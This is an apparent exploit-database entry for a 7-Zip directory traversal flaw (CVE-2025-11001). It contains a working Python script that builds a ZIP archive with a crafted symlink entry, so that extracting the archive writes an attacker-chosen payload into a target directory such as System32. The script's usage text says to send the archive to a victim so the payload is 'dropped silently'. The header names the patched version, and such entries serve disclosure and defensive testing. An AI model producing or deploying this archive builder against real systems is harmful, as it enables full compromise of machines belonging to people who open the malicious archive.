# Exploit Title: 7-Zip < 25.00 - Directory Traversal to RCE via Malicious ZIP
# Date: 2025-11-22
# Author: Mohammed Idrees Banyamer
# Author Country: Jordan
# Instagram: @banyamer_security
# GitHub: https://github.com/mbanyamer
# Vendor Homepage: https://www.7-zip.org
# Software Link: https://www.7-zip.org/download.html
# Version: 7-Zip < 25.00
# Tested on: Windows 10 / Windows 11 (7-Zip 24.xx)
# CVE: CVE-2025-11001
# CVSS: 8.8 (High) - draft estimation
# Category: Local Privilege Escalation / Remote Code Execution
# Platform: Windows
# CRITICAL: Yes - Public exploit available, active exploitation reported
# Including: Directory Traversal via crafted symlink entry in ZIP archive
# Impact: Full system compromise when extracting malicious archive with 7-Zip as Administrator
# Fix: Upgrade to 7-Zip 25.00 or later
# Advisory: https://www.7-zip.org/history.txt
# Patch: https://github.com/ip7z/7zip/releases/tag/25.00
# Target: Windows systems running vulnerable 7-Zip versions
import struct
import os
import argparse
import sys
def build_zip(target_path, payload_file, output_zip):
if not os.path.isfile(payload_file):
print(f"[-] Payload file not found: {payload_file}")
sys.exit(1)
payload_name = os.path.basename(payload_file)
payload_data = open(payload_file, "rb").read()
target = target_path.replace("\\", "/").strip("/") + "/"
traversal = "../../../../" + target
with open(output_zip, "wb") as f:
offset = 0
symlink_name = "evil.lnk"
symlink_target = traversal.encode() + b"\x00"
symlink_extra = struct.pack("<HH", 0x756e, len(symlink_target)) + symlink_target
symlink_header = struct.pack("<IHHHHHHIIIHH",
0x04034b50, 20, 0x800, 0x800, 0, 0, 0,
0, 0, 0,
len(symlink_name), len(symlink_extra))
f.write(symlink_header)
f.write(symlink_name.encode())
f.write(symlink_extra)
f.write(b"")
symlink_central_offset = offset
offset += len(symlink_header) + len(symlink_name) + len(symlink_extra)
payload_header = struct.pack("<IHHHHHHIIIHH",
0x04034b50, 20, 0x800, 0, 0, 0,
0, len(payload_data), len(payload_data),
len(payload_name), 0)
f.write(payload_header)
f.write(payload_name.encode())
f.write(payload_data)
payload_central_offset = offset
offset += len(payload_header) + len(payload_name) + len(payload_data)
cd_offset = offset
f.write(struct.pack("<IHHHHHHIIIHHHHHII",
0x02014b50, 0x0317, 20, 0x800, 0, 0, 0,
0, 0, 0,
len(symlink_name), len(symlink_extra), 0, 0, 0, 0o777 << 16 | 0xA1ED, symlink_central_offset))
f.write(symlink_name.encode())
f.write(symlink_extra)
f.write(struct.pack("<IHHHHHHIIIHHHHHII",
0x02014b50, 0x0317, 20, 0x800, 0, 0, 0,
0, len(payload_data), len(payload_data),
len(payload_name), 0, 0, 0, 0, 0o777 << 16, payload_central_offset))
f.write(payload_name.encode())
f.write(struct.pack("<IHHHHIIH",
0x06054b50, 0, 0, 2, 2, offset, cd_offset, 0))
print(f"[+] Malicious archive created: {output_zip}")
print(f"[+] Target path : {target_path}")
print(f"[+] Payload file : {payload_name} ({len(payload_data)} bytes)")
print(f"[+] Final write location : {target_path}\\{payload_name}")
print("\n[*] Usage:")
print(" 1. Send the ZIP file to the victim")
print(" 2. Victim must run 7-Zip < 25.00 as Administrator")
print(" 3. Victim opens and extracts the ZIP → payload dropped silently")
print(" 4. Achievement unlocked")
if __name__ == "__main__":
banner = """
CVE-2025-11001 - 7-Zip Directory Traversal PoC
Author: Mohammed Idrees Banyamer (@banyamer_security)
"""
print(banner)
parser = argparse.ArgumentParser(description="CVE-2025-11001 Exploit - 7-Zip < 25.00")
parser.add_argument("-t", "--target", required=True, help="Target directory (e.g. C:\\Windows\\System32)")
parser.add_argument("-p", "--payload", required=True, help="Payload file to drop (e.g. C:\\Windows\\System32\\calc.exe)")
parser.add_argument("-o", "--output", default="CVE-2025-11001-exploit.zip", help="Output ZIP filename (default: CVE-2025-11001-exploit.zip)")
args = parser.parse_args()
build_zip(args.target, args.payload, args.output)
